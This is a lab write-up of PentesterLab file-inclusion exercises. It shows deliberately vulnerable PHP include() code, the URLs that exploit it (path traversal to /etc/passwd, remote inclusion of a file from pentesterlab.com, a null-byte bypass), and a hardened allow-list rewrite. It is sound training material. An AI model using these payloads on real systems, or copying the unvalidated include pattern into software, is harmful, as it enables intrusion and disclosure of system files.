Pentestlab-Web for Pentester - File Include

Web for Pentester: This exercise is a set of the most common web vulnerabilities.

Difficulty: 1/5

OWASP: The File Inclusion vulnerability allows an attacker to include a file, usually by exploiting a “dynamic file inclusion” mechanism implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

Tool: ZAP

Example 1

code review:

example1.php

<?php
// Vulnerable on purpose: the user-controlled "page" parameter reaches include()
// with no validation at all (no allow-list, no path check, no URL check).
if ($_GET["page"]) {
    include($_GET["page"]);
}

The developer uses the include function in the code, but there is no filter to protect against file include attacks. Use Firebug to find that the variable name is page, then exploit:

http://192.168.79.162/fileincl/example1.php?page=../../../../../../etc/passwd

PentesterLab also provides an online test file at https://pentesterlab.com/test_include.txt, which can be included remotely:

http://192.168.79.162/fileincl/example1.php?page=https://pentesterlab.com/test_include.txt

Example 2

code review:

example2.php

<?php
// Vulnerable on purpose: ".php" is appended to the parameter, but the null byte
// emulation below strips everything from the first \x00 onward, so a trailing
// null byte cuts the suffix off again.
if ($_GET["page"]) {
    $file = $_GET["page"] . ".php";
    // simulate null byte issue
    $file = preg_replace('/\x00.*/', "", $file);
    include($file);
}

There is a null byte issue. The null byte character effectively tells the filesystem to ignore anything that comes after it when the path is resolved, so the appended ".php" is dropped.

So I can do:

http://192.168.79.162/fileincl/example2.php?page=https://pentesterlab.com/test_include.txt%00
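As an added example (not code from the PentesterLab exercise), here is a hardened rewrite of both handlers: the page parameter is matched against a fixed allow-list and the resolved path is checked with realpath() before include(), so the traversal, remote URL and null-byte inputs shown above are all rejected. The pages/ directory and the page names are assumed for illustration.

```php
<?php
// Added example, not part of the exercise: hardened page loader for the
// example1.php / example2.php pattern. Directory and page names are assumed.
declare(strict_types=1);

const PAGE_DIR = __DIR__ . '/pages';                 // assumed location of page files
const ALLOWED_PAGES = ['home', 'about', 'contact'];   // assumed page names

/**
 * Return the absolute path of an allowed page, or null for anything else.
 * Because only exact allow-list entries pass, "../../etc/passwd",
 * "https://.../test_include.txt" and any value ending in "\x00" are refused
 * before a file system path is ever built.
 */
function resolvePage(?string $page): ?string
{
    if ($page === null || !in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $page . '.php');
    // Defence in depth: realpath() canonicalises the path (following symlinks),
    // and we require the result to still sit inside PAGE_DIR.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$resolved = resolvePage($_GET['page'] ?? null);
if ($resolved === null) {
    http_response_code(404);
    echo 'Unknown page';
    exit;
}
include $resolved;
```

PHP 5.3.4 and later already reject paths containing a null byte in include(), and with allow_url_include=Off (the default) remote URLs are refused; the allow-list removes the dependence on those runtime settings entirely.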